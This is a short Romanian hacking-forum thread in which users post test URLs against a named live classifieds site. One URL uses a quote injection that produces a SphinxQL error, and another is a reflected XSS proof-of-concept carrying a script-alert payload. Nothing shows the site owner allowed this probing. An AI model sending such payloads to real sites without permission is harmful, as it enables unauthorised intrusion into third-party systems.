Systems Posted August 28, 2013 Report Share Posted August 28, 2013 (edited) http://www.tocmai.ro/cauta?q=&typ=1&ct=3&jd=27&pt=3000&marca=9'sphinxql: syntax error, unexpected $undefined, expecting $end near '' ORDER BY date_approved_ts DESC LIMIT 0,20 OPTION max_matches = 20'http://www.tocmai.ro/cauta?q=&typ=1&ct=3&jd=27&pt=3000&cb=1%27 Edited August 28, 2013 by Systems 1 Quote Link to comment Share on other sites More sharing options...
yoyois Posted August 29, 2013 Report Share Posted August 29, 2013 E doar o eroare, unde sunt informatiile extrase?Cred ca e mai greu sa nu generezi eroare cu o sintaxa SQL decat sa o generezi.In cazul de fata cred ca se foloseste un vector...Anyway. @System Mai cauta. Mai incearca. Si la viitoarele macar asigura-te ca sunt exploatabile. Quote Link to comment Share on other sites More sharing options...
TheTime Posted August 29, 2013 Report Share Posted August 29, 2013 Asta e tot ce am reusit. Nothing else. Quote Link to comment Share on other sites More sharing options...
coolbyte Posted August 29, 2013 Report Share Posted August 29, 2013 un xss http://www.tocmai.ro/cauta?q=&typ=1&ct=3&jd=27&pt=%27%3Cscript%3Ealert%28%22mata%22%29%3C/script%3Eh3000&cb=1 Quote Link to comment Share on other sites More sharing options...
